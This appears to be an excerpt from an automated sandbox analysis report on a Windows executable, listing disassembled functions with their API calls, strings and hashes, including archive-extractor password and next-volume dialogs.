                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007B4A90,?,?,007B4A30,?,007C7F68,0000000C,007B4B87,?,00000002), ref: 007B4AFF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007B4B12
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,007B4A90,?,?,007B4A30,?,007C7F68,0000000C,007B4B87,?,00000002,00000000), ref: 007B4B35
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                        • Opcode ID: cbe4b639c99f974b24fbd69a6a542836db99a947526aa9984f6d36a3258f5f45
                                                                                                                                        • Instruction ID: cd16288dfcc7d28ab1bda903c7119ff8f12221074c8abd78bad86236d33b69f1
                                                                                                                                        • Opcode Fuzzy Hash: cbe4b639c99f974b24fbd69a6a542836db99a947526aa9984f6d36a3258f5f45
                                                                                                                                        • Instruction Fuzzy Hash: 86F03C70A00208FFCB159F94DC49F9EBFB9EB44716F00416DA905A2151DB788980CBD4
                                                                                                                                        Function 0079DEB5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0079F324
                                                                                                                                          • Part of subcall function 0079F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0079DEC8,Crypt32.dll,?,0079DF4A,?,0079DF2E,?,?,?,?), ref: 0079F346
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0079DED4
                                                                                                                                        • GetProcAddress.KERNEL32(007D1E58,CryptUnprotectMemory), ref: 0079DEE4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                        • API String ID: 2141747552-1753850145
                                                                                                                                        • Opcode ID: ee7cbb7557e63902256050bd1b790fac84ff3e72c4d74a29581953d44e2b2fd7
                                                                                                                                        • Instruction ID: 40979394dc4ea15315a167a3ad8acc0df53b7586e98a4bc7a1b3a71f3db9a7d9
                                                                                                                                        • Opcode Fuzzy Hash: ee7cbb7557e63902256050bd1b790fac84ff3e72c4d74a29581953d44e2b2fd7
                                                                                                                                        • Instruction Fuzzy Hash: BBE046B0900B43EEDF505F79A809F05FBA4BBA4710F14862EF058E2640EBBCD4A48BD4
                                                                                                                                        Function 007B52F0 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                        • Opcode ID: 1e4edc7c2270d8023622646c07ad9be9f4d9f7d2e281ce09f3c10ae0ebb8cacc
                                                                                                                                        • Instruction ID: 2cce9f54119d1b4d85aeb23ebb54f14f6482db0154b21389a05cd4c5312cbcbe
                                                                                                                                        • Opcode Fuzzy Hash: 1e4edc7c2270d8023622646c07ad9be9f4d9f7d2e281ce09f3c10ae0ebb8cacc
                                                                                                                                        • Instruction Fuzzy Hash: 7341B032A00604DFCB20DF78C895B9EB7F5EF85318F158569E515EB381DA75AD01CB80
                                                                                                                                        Function 007B89AF Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 007B89B8
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007B89DB
                                                                                                                                          • Part of subcall function 007B59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,007B23AA,?,0000015D,?,?,?,?,007B2F29,000000FF,00000000,?,?), ref: 007B5A2E
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007B8A01
                                                                                                                                        • _free.LIBCMT ref: 007B8A14
                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007B8A23
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                        • Opcode ID: 66208fdfb4de9570cbcdeff2099ec65f06d221788cb7227198b1a48c487ef088
                                                                                                                                        • Instruction ID: 925215c64f4f38b7424fc4e45299b5ab1d9b6cb3f6db63d14b5e0d6a4c56d983
                                                                                                                                        • Opcode Fuzzy Hash: 66208fdfb4de9570cbcdeff2099ec65f06d221788cb7227198b1a48c487ef088
                                                                                                                                        • Instruction Fuzzy Hash: 33018872601615BB276166BA5C4CEFF6E6DDAC7F60314411EF904D3101DE788C01C1F2
                                                                                                                                        Function 007B63A3 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,007B5E43,007B5ADF,?,007B634D,00000001,00000364,?,007B2213,?,?,007CCBE8), ref: 007B63A8
                                                                                                                                        • _free.LIBCMT ref: 007B63DD
                                                                                                                                        • _free.LIBCMT ref: 007B6404
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,007CCBE8), ref: 007B6411
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,007CCBE8), ref: 007B641A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                        • Opcode ID: a4b33ce1dda39084ad3906c2dd866c16d5026b56666b49123cddceb98c523c36
                                                                                                                                        • Instruction ID: cee8da8606bb4151d15e4d9c131fc38b921734ad4afb977699e522cf3a4264a4
                                                                                                                                        • Opcode Fuzzy Hash: a4b33ce1dda39084ad3906c2dd866c16d5026b56666b49123cddceb98c523c36
                                                                                                                                        • Instruction Fuzzy Hash: 7F01D1B6245B00AB871227286C8EF9A2B69EBD17757318138F624A2182EE3D8D0142A4
                                                                                                                                        Function 007B926A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 007B9282
                                                                                                                                          • Part of subcall function 007B59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?), ref: 007B59D8
                                                                                                                                          • Part of subcall function 007B59C2: GetLastError.KERNEL32(?,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?,?), ref: 007B59EA
                                                                                                                                        • _free.LIBCMT ref: 007B9294
                                                                                                                                        • _free.LIBCMT ref: 007B92A6
                                                                                                                                        • _free.LIBCMT ref: 007B92B8
                                                                                                                                        • _free.LIBCMT ref: 007B92CA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: a0bce3498a93332c79dfba0966bd5f8b802a0727bc5d67b4e6c5083cb3211c8e
                                                                                                                                        • Instruction ID: dab3f073f92d6faddd968cac39ff455b5bc9b562cbe4ee5c288adf82be4bf68b
                                                                                                                                        • Opcode Fuzzy Hash: a0bce3498a93332c79dfba0966bd5f8b802a0727bc5d67b4e6c5083cb3211c8e
                                                                                                                                        • Instruction Fuzzy Hash: 13F01232A05708FB8A25EB5CF98AFD677E9BA047217548809F658D7511C73CFC808A58
                                                                                                                                        Function 007B553F Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 007B555D
                                                                                                                                          • Part of subcall function 007B59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?), ref: 007B59D8
                                                                                                                                          • Part of subcall function 007B59C2: GetLastError.KERNEL32(?,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?,?), ref: 007B59EA
                                                                                                                                        • _free.LIBCMT ref: 007B556F
                                                                                                                                        • _free.LIBCMT ref: 007B5582
                                                                                                                                        • _free.LIBCMT ref: 007B5593
                                                                                                                                        • _free.LIBCMT ref: 007B55A4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: d1069f6a8e555a3965864b36d67746d91e8561365334ccb4300ad24d193f16ef
                                                                                                                                        • Instruction ID: 77a4e962c5555a550432370123696a698166fa31f2d0cf52f01ab4b2d705f0bb
                                                                                                                                        • Opcode Fuzzy Hash: d1069f6a8e555a3965864b36d67746d91e8561365334ccb4300ad24d193f16ef
                                                                                                                                        • Instruction Fuzzy Hash: 99F0D0B1913654EB8B126F1CBC86A493BA5FB0C722345810AF4509E271C73D69119F8A
                                                                                                                                        Function 007B4BDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 007B4C1A
                                                                                                                                        • _free.LIBCMT ref: 007B4CE5
                                                                                                                                        • _free.LIBCMT ref: 007B4CEF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                        • String ID: C:\Users\user\Desktop\file.exe
                                                                                                                                        • API String ID: 2506810119-1957095476
                                                                                                                                        • Opcode ID: 3d95900dd0d37279edcdea8e4dbb3192619e8e0491febd2413c514c02e6a88aa
                                                                                                                                        • Instruction ID: e0c532c632d60f4107c3072b8042ce23f4e80463335f7db62a68a83c66d7e707
                                                                                                                                        • Opcode Fuzzy Hash: 3d95900dd0d37279edcdea8e4dbb3192619e8e0491febd2413c514c02e6a88aa
                                                                                                                                        • Instruction Fuzzy Hash: 02316671A02258EFDB21DF599C85BDEBFFCEB89710B104056F40497212D7789E40DB65
                                                                                                                                        Function 00797463 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00797468
                                                                                                                                          • Part of subcall function 00793AA3: __EH_prolog.LIBCMT ref: 00793AA8
                                                                                                                                        • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 0079752E
                                                                                                                                          • Part of subcall function 00797A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00797AAC
                                                                                                                                          • Part of subcall function 00797A9D: GetLastError.KERNEL32 ref: 00797AF2
                                                                                                                                          • Part of subcall function 00797A9D: CloseHandle.KERNEL32(?), ref: 00797B01
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                        • API String ID: 3813983858-639343689
                                                                                                                                        • Opcode ID: 607052b4fd56495d5a37c70581f92be05f30b6a85329ca4d45005910199c77a5
                                                                                                                                        • Instruction ID: 68a44b0a5d498f3d91c43387622135ac037b6757d3aec0f59a4f8d5645c73e7f
                                                                                                                                        • Opcode Fuzzy Hash: 607052b4fd56495d5a37c70581f92be05f30b6a85329ca4d45005910199c77a5
                                                                                                                                        • Instruction Fuzzy Hash: 4131EF71A04248EEDF11EFA8EC0AFEE7B68AF45314F048029F449A7292C77C5E14C7A1
                                                                                                                                        Function 007A9123 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007912E7: GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                          • Part of subcall function 007912E7: SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 007A91AB
                                                                                                                                        • GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 007A91C0
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 007A91D5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                                        • String ID: ASKNEXTVOL
                                                                                                                                        • API String ID: 445417207-3402441367
                                                                                                                                        • Opcode ID: 88a33e88f8b2b2c0770158746f10ea4adcf335b69be628bedcbb56a7c9781cb2
                                                                                                                                        • Instruction ID: 38fa5feabc3c129880b5807d34cd99e1fe8ccc3ec938016c42b1cec85aff45c0
                                                                                                                                        • Opcode Fuzzy Hash: 88a33e88f8b2b2c0770158746f10ea4adcf335b69be628bedcbb56a7c9781cb2
                                                                                                                                        • Instruction Fuzzy Hash: 3C11CF3224214BBFD6115F64ED8DF563759EF8B701F008114F3019B0A1C36DAC21DB65
                                                                                                                                        Function 007ABFAA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DialogBoxParamW.USER32(GETPASSWORD1,?,007A9646,?,?), ref: 007AC022
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogParam
                                                                                                                                        • String ID: *a}$*a}$GETPASSWORD1
                                                                                                                                        • API String ID: 665744214-282029742
                                                                                                                                        • Opcode ID: 3cdaa938e06a6a35a0060584bfb382b127dc5a69d62d8688af3e1555931cc5eb
                                                                                                                                        • Instruction ID: 81fad2e63c315cd4b901028ad6c645a36a8449a1181f757186e32645cb404df0
                                                                                                                                        • Opcode Fuzzy Hash: 3cdaa938e06a6a35a0060584bfb382b127dc5a69d62d8688af3e1555931cc5eb
                                                                                                                                        • Instruction Fuzzy Hash: 5E115B32244208FBDB22CE34AC05FAB3799BB4A755F048179FD48A7182D6BD5C41D798
                                                                                                                                        Function 007A9646 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007912E7: GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                          • Part of subcall function 007912E7: SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 007A9694
                                                                                                                                        • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 007A96AC
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 007A96DA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                                        • String ID: GETPASSWORD1
                                                                                                                                        • API String ID: 445417207-3292211884
                                                                                                                                        • Opcode ID: ea6c206cc9b3f747a93b42a36e6d67a1b69d393433c34a3138119c4ea0dd9886
                                                                                                                                        • Instruction ID: 360b1b09bc40728fa21b17046ff1d6c06821218405002d3a9181c68109d02775
                                                                                                                                        • Opcode Fuzzy Hash: ea6c206cc9b3f747a93b42a36e6d67a1b69d393433c34a3138119c4ea0dd9886
                                                                                                                                        • Instruction Fuzzy Hash: 53110432900118B7DB219E74AD49FFA376CEF8A741F004264FB49E2580C6ADAD20D7B1
                                                                                                                                        Function 0079B100 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _swprintf.LIBCMT ref: 0079B127
                                                                                                                                          • Part of subcall function 00793F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00793F6E
                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0079B145
                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0079B155
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                                        • String ID: %c:\
                                                                                                                                        • API String ID: 525462905-3142399695
                                                                                                                                        • Opcode ID: 6fc68f0c6934070f77fa86f72fbd8a61c79677bc820561c9db1a07d79ecee44c
                                                                                                                                        • Instruction ID: 3425b333a616df6f886b31b6b0ed01223513245011a72d1ecc8acd65108bd673
                                                                                                                                        • Opcode Fuzzy Hash: 6fc68f0c6934070f77fa86f72fbd8a61c79677bc820561c9db1a07d79ecee44c
                                                                                                                                        • Instruction Fuzzy Hash: 5E01F953544319B6CF30A775BD45D6BB7ACEF55360B50441BF844C2081FB28D850C2F2
                                                                                                                                        Function 0079F930 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InitializeCriticalSection.KERNEL32(000001A0,007D1E74,00000000,?,?,0079FB88,00000020,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?), ref: 0079F969
                                                                                                                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF), ref: 0079F973
                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF), ref: 0079F983
                                                                                                                                        Strings
                                                                                                                                        • Thread pool initialization failed., xrefs: 0079F99B
                                                                                                                                        Memory Dump Source
